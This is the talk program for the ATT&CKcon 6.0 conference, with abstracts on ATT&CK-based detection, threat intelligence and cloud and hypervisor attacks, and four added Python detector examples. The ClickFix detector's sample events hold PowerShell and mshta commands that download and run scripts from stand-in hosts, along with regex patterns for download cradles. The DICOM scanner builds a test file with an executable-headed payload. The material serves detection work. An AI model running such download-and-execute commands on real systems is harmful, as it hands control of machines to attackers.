ATT&CKcon 6.0


We’re grateful to everyone who joined ATT&CKcon 6.0!

This year’s program featured another outstanding lineup of speakers who shared fresh perspectives and real-world experiences, enriching the knowledge of our ATT&CK community. We encourage you to keep watching and sharing these insightful sessions!


Presentations
Keynote: Cyber for Good

Lillian Teng, Cybersecurity Leader

MITRE ATT&CK Updates: State of the ATT&CK

Adam Pennington, MITRE ATT&CK

ATT&CK Lead Adam Pennington discusses the latest changes in MITRE ATT&CK and what's coming down the pike for the framework.

The Never-evolving Threat Landscape: Forever Techniques and the Illusion of Change

Brian Donohue, Red Canary

"The ever-evolving threat landscape" is one of the most overused clichés in the security industry. It’s so ubiquitous that LLMs lead nearly every prompt response with some iteration of those five words. Unfortunately (or maybe fortunately), it doesn’t reflect reality. The threat landscape isn’t ever-evolving. If you track MITRE ATT&CK® technique abuse over time, you’ll find that adversaries largely leverage the same small set of techniques—and have for years. Threat names change, but the objectives of those threats and the capabilities they deploy are stagnant. There’s a strong illusion of change in adversary behavior propped up by new technologies, the vagaries of visibility, and our collective obsession with sophistication and novelty. You’ll read new articles about staggering breaches, but the technical details often reveal a pattern of well-worn tactics, techniques, and procedures. You’ll read news articles about fantastical targeted attacks, but if you read below the fold or between the lines, you’ll realize the adversary was after a specific organization for a specific reason. In this talk, I will use operational data and historical examples to argue that the past is indeed a good predictor of the future, and enumerate the ATT&CK techniques that organizations should prioritize.

Practical Application of MITRE ATT&CK: Tactical CTI to Enable Security Operations

Andy Castro, Feedly

CTI reporting can often lack the technical information for the teams who need to act on it. This talk shows how to make threat intel more tactical and useful by aligning it to the workflows of detection engineers, threat hunters, and incident responders using MITRE ATT&CK as a shared framework. I’ll walk through how to tailor reporting to different security functions, highlight key elements each team actually cares about, and show how to go from report to a hunt-ready package. I’ll also share code that extracts ATT&CK techniques from a report and pulls mapped Sigma rules to support hunting and detection. Attendees will leave with practical strategies to turn reporting into results, speak the language of their security teams, and use ATT&CK to operationalize threat intelligence across functions.
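The report-to-hunt-package step described above, as an added Python example that is not Feedly's or the speaker's code: it pulls technique IDs out of free text with a regular expression, normalises Sigma `attack.tNNNN.NNN` tags to the same form, and groups matching rule titles under each technique so a hunter sees both the rules to run and the techniques with no rule at all. The report excerpt and the four rules are constructed for the example; in practice the rules would be loaded from Sigma YAML files and the tags read from their `tags:` list.

```python
import re

# Technique IDs as they appear in prose: T1059, T1059.001, or lower-case t1566.002.
TECHNIQUE_RE = re.compile(r"\bT(\d{4})(?:\.(\d{3}))?\b", re.IGNORECASE)
# Sigma tags the same technique as attack.t1059.001 (tactic tags look like attack.execution).
SIGMA_TAG_RE = re.compile(r"attack\.t(\d{4})(?:\.(\d{3}))?")


def _normalise(match):
    tid = "T" + match.group(1)
    return tid + "." + match.group(2) if match.group(2) else tid


def extract_techniques(report_text):
    """Set of normalised ATT&CK technique IDs (e.g. 'T1059.001') mentioned in a report."""
    return {_normalise(m) for m in TECHNIQUE_RE.finditer(report_text)}


def technique_from_tag(tag):
    """Map a Sigma tag such as 'attack.t1059.001' to 'T1059.001'; tactic tags give None."""
    m = SIGMA_TAG_RE.fullmatch(tag.lower())
    return _normalise(m) if m else None


def build_hunt_package(report_text, sigma_rules, include_parent=True):
    """Group Sigma rule titles under each technique the report mentions.

    Many rule sets tag only the parent technique (attack.t1059), so with
    include_parent a rule tagged T1059 is also offered for T1059.001.
    """
    techniques = extract_techniques(report_text)
    package = {t: [] for t in sorted(techniques)}
    for rule in sigma_rules:
        rule_techs = {t for t in map(technique_from_tag, rule.get("tags", [])) if t}
        for t in techniques:
            if t in rule_techs or (include_parent and t.split(".")[0] in rule_techs):
                package[t].append(rule["title"])
    return package


# Constructed report excerpt and rule set (not real reporting and not real Sigma rules).
SAMPLE_REPORT = """
The operator delivered a macro-laden document (T1566.001); the macro spawned
PowerShell to fetch a second stage (T1059.001), and the actor later moved to
file servers over SMB (t1021.002).
"""
SAMPLE_RULES = [
    {"title": "Suspicious PowerShell Download Cradle", "tags": ["attack.execution", "attack.t1059.001"]},
    {"title": "Office Application Spawning Shell", "tags": ["attack.initial_access", "attack.t1566.001", "attack.t1059"]},
    {"title": "Admin Share Access From Unusual Host", "tags": ["attack.lateral_movement", "attack.t1021.002"]},
    {"title": "Scheduled Task Creation", "tags": ["attack.persistence", "attack.t1053.005"]},
]

if __name__ == "__main__":
    for technique, titles in build_hunt_package(SAMPLE_REPORT, SAMPLE_RULES).items():
        print(technique, "->", titles or "no mapped rule: detection gap")
```

An empty list for a technique is the useful output here: it is a technique the report says the actor uses and for which the hunt team has nothing to run.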

What the Adversary Taught Me: Using ATT&CK to Identify TTP Trends and Prioritize Detections

Krysta Horocofsky and Connor Kovacs, Recorded Future

Security teams continually strive to stay ahead of adversaries by accurately identifying, tracking, and prioritizing threat behaviors. The MITRE ATT&CK Framework is an invaluable tool for categorizing adversarial Tactics, Techniques, and Procedures (TTPs). This presentation explores how systematic mapping of adversarial behaviors using the ATT&CK framework can reveal trends, helping organizations refine their detection and response strategies. Leveraging Recorded Future’s extensive threat intelligence and Insikt Group’s dedicated research into new and emerging threats, we illustrate workflows for extracting meaningful TTPs from open-source intelligence. We discuss methodologies, including manual and AI-assisted techniques, emphasizing accuracy and clarity in differentiating between human-driven adversary actions and automated malware behavior. We present practical methods for visualizing TTP trends and attack chains, highlighting effective prioritization strategies based on prevalence, impact, and visibility. Through detailed case studies, we demonstrate how to correlate ATT&CK data with real-world malware campaigns and develop targeted detection rules using Sigma and other frameworks.

MITRE ATT&CK Updates: Defensive ATT&CK

Lex Crumpton, MITRE ATT&CK

Hunt Smarter, Not Harder: The Piranha Approach to Threat-Informed Defense

William Smail and Jared Thornton, Analyst

What good is threat intelligence to operations if they speak a different language? Bridging the gap between cyber threat intelligence and defensive operations requires more than shared intent—it requires shared structure. Without a common framework, intelligence stays abstract and operations stay reactive. This workflow-driven approach uses the MITRE ATT&CK framework as a foundation to translate CTI into relevant hunt plans by combining adversary TTP mapping, CVE to TTP correlation, and optimized tactic selection—each reinforcing the others to align with a team’s collection capabilities to ensure. Through the symphony and harmony of this data, we can create actionable hunt plans that not only align with intelligence, but remain relevant to what your network is vulnerable to. These methods have been applied across threat emulation and hunt operations and reinforced through the development of Piranha, an open-source tool built to support—but not define—the process. For teams working to bridge the divide between intel and operations, this approach offers a practical path toward unified, threat-informed defense.

Unlocking ATT&CK: Why Procedures Matter More Than Techniques

Billy Purnell, Lloyds Banking Group

While MITRE ATT&CK has become a cornerstone of threat-informed defense, most implementations stop at the technique level—offering broad categorizations that lack the procedural depth needed for real-world application. This talk explores the critical limitations of technique-level mappings and makes the case for elevating procedures as the foundation for actionable security outcomes. We’ll examine how vague or inconsistent procedure descriptions hinder detection engineering, purple teaming, and control validation. Then, we’ll introduce a structured approach to solving this problem— defining a common schema for procedures, building a graph-based procedural intelligence repository, and operationalising it through analyst tooling and automation. Finally, we’ll show how a procedure base enables threat-informed detection, automates purple teaming, and supports meaningful control effectiveness assessments– all grounded in what attackers actually do, not just what they’re mapped to. If you’re looking to move beyond checkbox ATT&CK coverage and toward meaningful, threat-driven security, this session is for you.

Human-First Tactics: Red Teaming Where Automation Fails to Simulate Techniques

Berk Kandemir, IBM

In an era dominated by automation, AI tooling, and simulated adversaries, one truth is still with us: the most impactful Red Team operations still hinge on human creativity. I will try to explore the MITRE ATT&CK tactics of Reconnaissance, Resource Development, and Initial Access, areas where automation falters and the human mind thrives. Most security vendors promise full-spectrum simulation for MITRE, but these are mostly small script-based automation techniques that do not reflect real attack chains. Techniques such as building trust relationships, phishing for critical context, discovering companies' unknowns, the historical records of entities, or discovering obscure services and their underlying logic remain deeply human tasks. I will walk through real Red Team success stories where manual investigation, social navigation, and out-of-the-box thinking exposed critical gaps that tools could never detect. Attendees will see human-driven operations, practical examples of manual techniques that worked, and a clear understanding of why early-stage tactics in ATT&CK still demand intuition, analysis, human interactions with sense, and social engineering, not scripts.

Beyond Detection Engineering: Building Signals Engineering at GitLab

Matthew Coons, GitLab

Detection Engineering has become a cybersecurity buzzword, but many organizations have overwhelming alerts and rely on vendor-provided detection capabilities. At GitLab, we've evolved beyond traditional Detection Engineering to create Signals Engineering – fundamentally digging deeper into the signals that group together into security detections. This presentation reveals how we built GitLab's Signals Engineering Team (SET) with a single vision - to ensure cybersecurity incidents never go undetected. We will cover key innovations such as AI-powered detection reviews; the User Attestation Module (UAM), which routes 40% of security alerts to end users for self-validation through Slack automation; and our GitLab CI/CD pipeline that automatically validates, tests, and deploys SIEM detections with comprehensive quality checks. We will also cover how we've leveraged MITRE ATT&CK and maturity models like Summiting the Pyramid as a north star for detection and signals engineering. The audience will learn practical implementation strategies for Detection-as-Code, metrics-driven detection improvement, and building self-service security capabilities that scale. We will cover what went well and what we learned. Attendees will leave with a number of actionable insights and useful knowledge applicable to any organization with a desire to effectively and proactively detect potential threats.

Paste and rundown: Tracking and clustering ClickFix campaigns

Stef Rand, Red Canary

Paste and run (aka ClickFix, fakeCAPTCHA) has been one of the most successful initial execution vectors in the past year, and it’s only getting more popular. From its first reported use in March 2024 to the March 2025 addition of T1204.004 User Execution: Malicious Copy and Paste to MITRE ATT&CK, Red Canary has seen our fair share of users tricked into copying, pasting, and executing malicious code via T1204.004. I’ll dig into some of the threat intelligence challenges we faced tracking and clustering this threat from an endpoint perspective, and share how leveraging its ATT&CK technique helped us. Attendees will learn about the Red Canary threat intel team's research into this threat over the past year and walk away with practical detection opportunities.
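A detection opportunity for T1204.004 of the kind the abstract promises, as an added Python example that is not Red Canary's detection logic: it scores process-creation events in which explorer.exe (the parent of anything launched from the Win+R Run dialog or the Explorer address bar) spawns a script interpreter whose command line carries an in-memory download cradle, a hidden window, an encoded command, or the fake-CAPTCHA lure text that victims paste along with the command. The events, indicator weights, and threshold are constructed for the example and should be tuned against your own telemetry; the same cradle launched by a service is deliberately out of scope so the detector stays tied to user execution.

```python
import re

# Both the Win+R Run dialog and the File Explorer address bar launch their child under explorer.exe.
LAUNCHERS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "certutil.exe"}

# (pattern over the lower-cased command line, weight, explanation). Weights are illustrative.
INDICATORS = [
    (r"\b(iex|invoke-expression)\b", 3, "script evaluated in memory"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|certutil)\b", 2, "download cradle"),
    (r"\bmshta(\.exe)?\s+https?://", 4, "mshta loading a remote HTA"),
    (r"-(w|windowstyle)\s+h(idden)?\b", 2, "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", 2, "encoded command"),
    (r"#.*(captcha|robot|verif)", 3, "fake CAPTCHA lure text pasted along with the command"),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """(score, reasons) for one process-creation event; (0, []) when the parent/child pair is out of scope."""
    if _basename(ev["parent_image"]) not in LAUNCHERS or _basename(ev["image"]) not in INTERPRETERS:
        return 0, []
    cmd = ev["command_line"].lower()
    hits = [(weight, why) for pattern, weight, why in INDICATORS if re.search(pattern, cmd)]
    return sum(w for w, _ in hits), [why for _, why in hits]


def detect_clickfix(events, threshold=4):
    """(index, score, reasons) for every event that looks like a paste-and-run execution."""
    flagged = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((i, score, reasons))
    return flagged


# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {   # 0: the paste-and-run chain, lure text and all
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -c "iex (iwr \'http://update-check.example/verify.ps1\')" '
                        "# I am not a robot - reCAPTCHA Verification ID: 4829",
    },
    {   # 1: an administrator running a local script from Explorer
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # 2: the mshta variant
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta https://cdn.example.net/verify/captcha.hta",
    },
    {   # 3: same cradle launched by a service: not a user paste, so out of this detector's scope
        "parent_image": r"C:\Windows\System32\services.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -c "iex (iwr \'http://10.0.0.5/agent.ps1\')"',
    },
]

if __name__ == "__main__":
    for index, score, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {index}: score {score}: {', '.join(reasons)}")
```

The parent-process constraint is what keeps this from firing on every admin who runs PowerShell; the lure-text indicator is cheap and specific because the pasted command is usually copied verbatim, comment included.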

Automating ATT&CK Flow Diagrams for Faster Threat Analysis

David Johnson, Feedly

CTI analysts spend hours reading technical reports to understand attack flows. This manual process creates bottlenecks in the threat response process. I built FlowViz to automatically generate ATT&CK flow diagrams from threat intelligence reports. The program uses large language models to parse STIX objects, extract attack procedures, and create interactive visualizations. Analysts click on nodes to see detailed context. The tool can also process images in technical documents and export results as PNG, JSON, or ATT&CK Flow Builder files. This presentation demonstrates how automating with FlowViz can help analysts gather insights faster. I will demonstrate real-world examples of complex attack chains that can be mapped in seconds, rather than hours. FlowViz will be open-sourced and offered as a service. I will discuss API integration for automated threat intelligence pipelines. Attendees will learn how AI augments ATT&CK framework usage without replacing human judgment.

The Self-Healing Detection System: A Practical Framework for Strengthening Your Threat Coverage

Rajesh Sharma and Jacob Schorr, AttackIQ Inc and Accenture

As detection rule libraries expand, security teams face a paradox: more alerts, more tools—but limited improvement in actual threat prevention. In this talk, we present a new perspective: treating your detection stack as a living system, one that can become bloated, misfiring, or even self-destructive without care. We introduce a four-dimensional scoring framework—Resilience, Impact, Readiness, and Relevance—to help practitioners assess and strengthen their detection logic. This model helps identify broken rules, prioritize high-value detections, and reduce alert noise by focusing on measurable defensive value. We then explore how this framework lays the foundation for an exciting future: a self-healing detection system, capable of continuously improving itself. In this vision, agentic AI acts like an immune system trainer—testing defenses, pruning dead logic, and reinforcing the rules that matter most. Whether you're tuning detections by hand or imagining the next frontier in adaptive defense, this talk delivers both a practical methodology and a compelling outlook on what comes next.

Updates from the Center for Threat-Informed Defense

Suneel Sundar and Leslie Anderson, MITRE ATT&CK

ATT&CK v17 and the Increasingly Targeted ESXi Attack Surface

Joseph Comps, Vali Cyber

As enterprise virtualization scales, hypervisors like VMware ESXi have emerged as critical—and increasingly exploited—attack surfaces. High-profile breaches such as the Scattered Spider attacks, MGM Resorts ($110M) breach, and Johnson Controls ($51M) breach, highlight the hypervisor’s massive blast radius and the lasting operational disruption that can result when this layer is compromised. This session presents a deep dive into real-world techniques leveraged by ransomware groups to breach ESXi environments, including remote execution via the Service Location Protocol (SLP), identity-based escalation through misconfigured Active Directory integrations, and traditional credential cracking targeting hypervisor management interfaces. With the release of ATT&CK v17, these attack paths are now formally recognized by the addition of the ESXi platform—providing long-needed structure and validation for what defenders have seen in the wild. We’ll walk through how each phase of these attacks maps to specific ATT&CK techniques, and show how this knowledge can inform detection, threat hunting, and hardening strategies. Attendees will leave with a practical understanding of hypervisor-layer tradecraft and a framework for closing coverage gaps using ATT&CK. This talk is ideal for red teamers, blue teamers, and infrastructure defenders looking to secure one of the most overlooked—and increasingly targeted—layers in enterprise infrastructure.

ATT&CKing VMware From a Defender's Perspective

Reid Gilman, Boston Children's Hospital

Extortion threat actors have figured out that lots of organizations use VMware and it tends to be mission-critical infrastructure. In this talk, we will discuss how we assessed threats to a VMware environment, how we designed defensive measures, and how those map to ATT&CK. We will discuss challenges that defenders face both justifying and implementing defenses like this. We will also talk about challenges defenders face using a tool like ATT&CK in a scenario with limited threat intelligence. This talk will be less focused on threat intelligence and more focused on a defender's perspective using ATT&CK in the context of designing defenses for a complex environment. While this talk will use VMware as an example, we believe the concepts apply to other hypervisors and other critical enterprise systems.

Leveraging ATT&CK to Fortify Detections for Scattered Spider and Other Advanced Threats

Damien Miller-McAndrews, Obsidian Security

Join Damien, Threat Researcher at Obsidian Security, and dive into the web of the notorious hacker group Scattered Spider. We’ll analyze Scattered Spider from a SaaS perspective, looking at their TTPs and covering notable incidents both public and undisclosed. Then, you'll learn how Obsidian has used ATT&CK to improve detection coverage for Scattered Spider and other advanced actors, and how you can too.

MITRE ATT&CK Updates: Enterprise

Lauren Lusty, MITRE ATT&CK

Living off the Cloud: Classifying "LOAB & LOAR" Techniques and Detecting them with the MITRE ATT&CK Cloud Matrix

Hieu Tran, FPT Software

Endpoint "living-off-the-land" binaries are old news; attackers are now abusing built-in cloud tools instead. We introduce LOAB (Living Off Azure Binaries) and LOAR (Living Off AWS Resources): a curated set of cloud-native primitives—think azcopy, ssm start-session, sts assume-role, and more—that enable malware-free execution, lateral movement, and exfiltration. By analyzing recent ransomware and espionage breaches and mapping each primitive to the MITRE ATT&CK Cloud matrix, we created an open-source Navigator layer, a detection pack (Sigma, KQL, CloudWatch), and atomic test scripts.
During the session, a live purple-team demo shows AzCopy data theft and SSM pivoting in a sandbox, the rules firing, and an ATT&CK heat-map changing from red to green. Attendees leave with drop-in queries, ready-made tests, and a CI template that fails any pull request when coverage gaps reappear.
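One detection for the SSM pivot primitive named above, as an added Python example that is not the speaker's detection pack: it walks CloudTrail events in time order, remembers which sts:AssumeRole call minted each temporary access key, and emits a finding for every ssm:StartSession whose issuing role is not approved for interactive access (or that ran on long-lived IAM user credentials), tying the session back to the principal that assumed the role and noting when the session came from a different source IP than the AssumeRole did. The account ID, role names, approved-role set, and events are constructed for the example; the field names follow CloudTrail's record format.

```python
from datetime import datetime, timezone

ACCOUNT = "111122223333"                         # constructed account ID
APPROVED_SSM_ROLES = {f"arn:aws:iam::{ACCOUNT}:role/ssm-operators"}   # roles allowed to open sessions


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def correlate_ssm_pivots(events, approved_roles):
    """Findings for ssm:StartSession calls issued outside the approved role set.

    AssumeRole responses carry the temporary accessKeyId they mint; later calls made
    with that key carry it in userIdentity.accessKeyId, which is the join used here.
    """
    minted = {}   # temporary accessKeyId -> the AssumeRole event that produced it
    findings = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        src, name, ident = ev["eventSource"], ev["eventName"], ev["userIdentity"]
        if src == "sts.amazonaws.com" and name == "AssumeRole":
            key = ev.get("responseElements", {}).get("credentials", {}).get("accessKeyId")
            if key:
                minted[key] = ev
            continue
        if not (src == "ssm.amazonaws.com" and name == "StartSession"):
            continue
        issuer = ident.get("sessionContext", {}).get("sessionIssuer", {}).get("arn")
        reasons = []
        if issuer is None:
            reasons.append("session started with long-lived credentials, not an assumed role")
        elif issuer not in approved_roles:
            reasons.append(f"issuing role {issuer} is not approved for Session Manager")
        if not reasons:
            continue
        origin = minted.get(ident.get("accessKeyId"))
        if origin and origin["sourceIPAddress"] != ev["sourceIPAddress"]:
            reasons.append("StartSession came from a different source IP than the AssumeRole that minted its key")
        findings.append({
            "target": ev["requestParameters"].get("target"),
            "caller": ident.get("arn"),
            "issuer": issuer,
            "minted_by": origin["userIdentity"]["arn"] if origin else None,
            "seconds_after_assume": int((_ts(ev["eventTime"]) - _ts(origin["eventTime"])).total_seconds()) if origin else None,
            "reasons": reasons,
        })
    return findings


def _event(time, source, name, identity, params=None, ip="203.0.113.7", response=None):
    """Constructed CloudTrail-shaped record holding only the fields the detector reads."""
    return {"eventTime": time, "eventSource": source, "eventName": name, "userIdentity": identity,
            "requestParameters": params or {}, "responseElements": response or {}, "sourceIPAddress": ip}


SAMPLE_EVENTS = [
    # A CI service user assumes a deploy role, then that role opens a shell on an instance from another IP.
    _event("2025-10-14T13:02:11Z", "sts.amazonaws.com", "AssumeRole",
           {"type": "IAMUser", "arn": f"arn:aws:iam::{ACCOUNT}:user/build-svc", "accessKeyId": "AKIAEXAMPLE111"},
           {"roleArn": f"arn:aws:iam::{ACCOUNT}:role/ci-deploy"},
           response={"credentials": {"accessKeyId": "ASIAEXAMPLETEMP01"}}),
    _event("2025-10-14T13:03:40Z", "ssm.amazonaws.com", "StartSession",
           {"type": "AssumedRole", "arn": f"arn:aws:sts::{ACCOUNT}:assumed-role/ci-deploy/build-svc",
            "accessKeyId": "ASIAEXAMPLETEMP01",
            "sessionContext": {"sessionIssuer": {"arn": f"arn:aws:iam::{ACCOUNT}:role/ci-deploy"}}},
           {"target": "i-0abc123def456"}, ip="198.51.100.9"),
    # An operator doing the same thing through the approved role: no finding.
    _event("2025-10-14T13:10:00Z", "sts.amazonaws.com", "AssumeRole",
           {"type": "IAMUser", "arn": f"arn:aws:iam::{ACCOUNT}:user/alice", "accessKeyId": "AKIAEXAMPLE333"},
           {"roleArn": f"arn:aws:iam::{ACCOUNT}:role/ssm-operators"},
           response={"credentials": {"accessKeyId": "ASIAEXAMPLETEMP02"}}),
    _event("2025-10-14T13:11:05Z", "ssm.amazonaws.com", "StartSession",
           {"type": "AssumedRole", "arn": f"arn:aws:sts::{ACCOUNT}:assumed-role/ssm-operators/alice",
            "accessKeyId": "ASIAEXAMPLETEMP02",
            "sessionContext": {"sessionIssuer": {"arn": f"arn:aws:iam::{ACCOUNT}:role/ssm-operators"}}},
           {"target": "i-0abc123def456"}),
    # An IAM user with a long-lived key opening a session directly.
    _event("2025-10-14T13:20:00Z", "ssm.amazonaws.com", "StartSession",
           {"type": "IAMUser", "arn": f"arn:aws:iam::{ACCOUNT}:user/bob", "accessKeyId": "AKIAEXAMPLE222"},
           {"target": "i-0fedcba987654"}),
]

if __name__ == "__main__":
    for f in correlate_ssm_pivots(SAMPLE_EVENTS, APPROVED_SSM_ROLES):
        print(f["target"], f["caller"], "<-", f["minted_by"], ":", "; ".join(f["reasons"]))
```

The join on the temporary access key is what turns "a role opened a session" into "this user, from this IP, became that role 89 seconds earlier and then opened a session"; the same key-based correlation works for azcopy-style data movement events once the actor has pivoted.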

Extending ATT&CK: Modeling Sector-Specific Threats with Workbench and Navigator

Jared Quinn, FBI

What happens when adversaries exploit the implicit trust placed in sector-specific file formats - like medical imaging files - instead of traditional malware? This presentation explores a healthcare-specific threat scenario involving DICOM (.dcm) files and introduces a custom MITRE ATT&CK extension that captures how these files can be weaponized. Using Workbench and Navigator, the talk walks through the creation of a new Sub-Technique - Malicious Domain-Specific File (Healthcare) - under T1204: User Execution, and demonstrates how custom Mitigations, Detections, and Analytics were developed to support it. Attendees will see how injector and scanner scripts were built to simulate abuse (e.g., spoofed transfer syntax UIDs, private metadata tags, and embedded payloads) and how these behaviors were mapped in a reusable ATT&CK Navigator Layer. This isn’t just a healthcare problem - it’s a reminder of how ATT&CK can capture threats unique to critical sectors. Attendees will leave with a concrete example of how to build sector-informed content using ATT&CK tooling and apply it to their own operational environments.
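A scanner of the kind the abstract's injector/scanner scripts would pair with, as an added Python example that is not the speaker's tooling and uses only the standard library: it inspects the 128-byte preamble (which the DICOM standard leaves unconstrained, so it can hold another format's header and make the file a polyglot), reads the transfer syntax UID from the file meta group, and walks an explicit VR little endian dataset flagging elements that start with executable or archive magic and private (odd-group) elements that are oversized. The two sample files are built in the block itself; the unrecognised transfer syntax UID and the private tag (0029,1010) are constructed values, and the parser stops at undefined-length elements rather than guessing.

```python
import struct

LONG_VRS = {b"OB", b"OW", b"OF", b"SQ", b"UT", b"UN"}   # VRs with a 4-byte length field
KNOWN_TRANSFER_SYNTAXES = {
    "1.2.840.10008.1.2", "1.2.840.10008.1.2.1", "1.2.840.10008.1.2.2",
    "1.2.840.10008.1.2.4.50", "1.2.840.10008.1.2.4.70", "1.2.840.10008.1.2.4.90",
    "1.2.840.10008.1.2.5",
}
FOREIGN_MAGICS = {b"MZ": "PE/DOS executable", b"\x7fELF": "ELF executable",
                  b"PK\x03\x04": "ZIP archive", b"#!": "script shebang"}
PRIVATE_SIZE_LIMIT = 1024   # illustrative threshold for private-element payloads


def iter_elements(buf, pos):
    """Yield (group, element, vr, value, end) for explicit VR little endian elements from pos."""
    while pos + 8 <= len(buf):
        group, elem = struct.unpack_from("<HH", buf, pos)
        vr = buf[pos + 4:pos + 6]
        if not (vr.isalpha() and vr.isupper()):
            return                       # not explicit VR: refuse to guess
        if vr in LONG_VRS:
            if pos + 12 > len(buf):
                return
            (length,) = struct.unpack_from("<I", buf, pos + 8)
            start = pos + 12
        else:
            (length,) = struct.unpack_from("<H", buf, pos + 6)
            start = pos + 8
        if length == 0xFFFFFFFF:         # undefined length (sequences, encapsulated pixel data): stop
            return
        end = min(start + length, len(buf))
        yield group, elem, vr, buf[start:end], end
        pos = end


def scan_dicom(buf):
    """List of findings for one DICOM file held in memory; empty means nothing suspicious."""
    findings = []
    for magic, desc in FOREIGN_MAGICS.items():
        if buf[:128].startswith(magic):
            findings.append(f"preamble carries a {desc} header: DICOM/{desc} polyglot")
    if buf[128:132] != b"DICM":
        findings.append("missing DICM magic after the 128-byte preamble")
        return findings
    transfer_syntax, pos = None, 132
    for group, elem, vr, value, end in iter_elements(buf, 132):
        if group != 0x0002:
            break                        # end of file meta information
        if elem == 0x0010:
            transfer_syntax = value.rstrip(b"\x00 ").decode("ascii", "replace")
        pos = end
    if transfer_syntax is None:
        findings.append("no transfer syntax UID (0002,0010) in file meta information")
    elif transfer_syntax not in KNOWN_TRANSFER_SYNTAXES:
        findings.append(f"unrecognised transfer syntax UID {transfer_syntax}")
    if transfer_syntax in ("1.2.840.10008.1.2", "1.2.840.10008.1.2.2"):
        return findings                  # implicit VR / big endian bodies need a fuller parser
    for group, elem, vr, value, _ in iter_elements(buf, pos):
        tag = f"({group:04X},{elem:04X})"
        private = group % 2 == 1 and group not in (1, 3, 5, 7, 0xFFFF)
        for magic, desc in FOREIGN_MAGICS.items():
            if value.startswith(magic):
                findings.append(f"element {tag} carries a {desc} header")
        if private and len(value) > PRIVATE_SIZE_LIMIT:
            findings.append(f"private element {tag} carries {len(value)} bytes")
    return findings


def encode(group, elem, vr, value):
    """Serialise one explicit VR little endian element (values padded to even length)."""
    if len(value) % 2:
        value += b"\x00" if vr in (b"UI", b"OB") else b" "
    head = struct.pack("<HH", group, elem) + vr
    if vr in LONG_VRS:
        return head + b"\x00\x00" + struct.pack("<I", len(value)) + value
    return head + struct.pack("<H", len(value)) + value


def build_dicom(preamble, transfer_syntax, dataset):
    """Constructed test file: preamble, DICM, a minimal file meta group, then the dataset."""
    meta = (encode(2, 0x0002, b"UI", b"1.2.840.10008.5.1.4.1.1.2")      # CT Image Storage SOP class
            + encode(2, 0x0003, b"UI", b"1.2.3.4.5.6")
            + encode(2, 0x0010, b"UI", transfer_syntax.encode()))
    meta = encode(2, 0x0000, b"UL", struct.pack("<I", len(meta))) + meta
    return preamble.ljust(128, b"\x00")[:128] + b"DICM" + meta + b"".join(encode(*e) for e in dataset)


BENIGN = build_dicom(b"", "1.2.840.10008.1.2.1", [
    (0x0008, 0x0060, b"CS", b"CT"), (0x0010, 0x0010, b"PN", b"DOE^JANE"), (0x7FE0, 0x0010, b"OB", b"\x00" * 64)])
MALICIOUS = build_dicom(b"MZ\x90\x00\x03\x00\x00\x00", "1.2.840.10008.1.2.99", [
    (0x0008, 0x0060, b"CS", b"CT"),
    (0x0029, 0x1010, b"OB", b"MZ" + b"\x90" * 2000),   # payload parked in a private element
    (0x7FE0, 0x0010, b"OB", b"\x00" * 64)])

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, scan_dicom(blob) or "clean")
```

The preamble check is the important one for the polyglot case: a viewer that seeks straight to offset 128 will render the image happily while the same bytes run as an executable elsewhere.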

MITRE ATT&CK Updates: New Tactics in Enterprise

Cat Self, MITRE ATT&CK

Inside the Browser Matrix: Mapping the Unseen Threat Surface

Neal Humphrey, Seraphic Security

The browser is no longer just a delivery mechanism; it's an active execution surface. Yet, ATT&CK lacks a dedicated platform to represent browser-native techniques, such as extension abuse, cross-context messaging hijack, session token exfiltration, and DOM-based persistence. In this session, we walk through the process of discovering, simulating, and mapping these browser-specific TTPs using BrowserTotal, an open threat emulation and telemetry platform designed to expose browser-layer threats. We’ll share real-world observations, ATT&CK mappings, and gaps, and propose an expansion of the ATT&CK Matrix to formally introduce “Browser” as a platform. The session concludes with a bold proposal: launching a new MITRE Evaluation Track for Browser Security, which will cover simulation design, evaluation criteria, and open telemetry contributions. Key takeaways for attendees: a new lens to view browsers as threat surfaces; real ATT&CK-aligned browser TTPs observed and simulated; a blueprint for contributing techniques to the ATT&CK matrix; and a call to action to join a proposed MITRE Evaluation for browser platforms.

Discovering Co-occurrence Patterns of MITRE ATT&CK Techniques in CTI Reports

Saurav Bhattacharya, The New World Foundation

This study analyzes MITRE ATT&CK technique usage and co-occurrence patterns across sentence-level and report-level annotations in the CTI-HAL dataset. We explore both the limits and insights of rule-based association mining at the sentence level and demonstrate stronger co-occurrence signals when techniques are grouped at the document level. Frequency distributions, negative results, and the implications for threat detection, adversary emulation, and ATT&CK coverage prioritization are discussed. We also evaluate the role of annotation sparsity, technique coverage bias, and the implications of low co-occurrence on adversary modeling.

REALITYCHECK: An ATT&CK-Aligned, Principled, and Automated Investigation of AR/VR Attacks

Muhammad Shoaib and Wajih Ul Hassan, University of Virginia

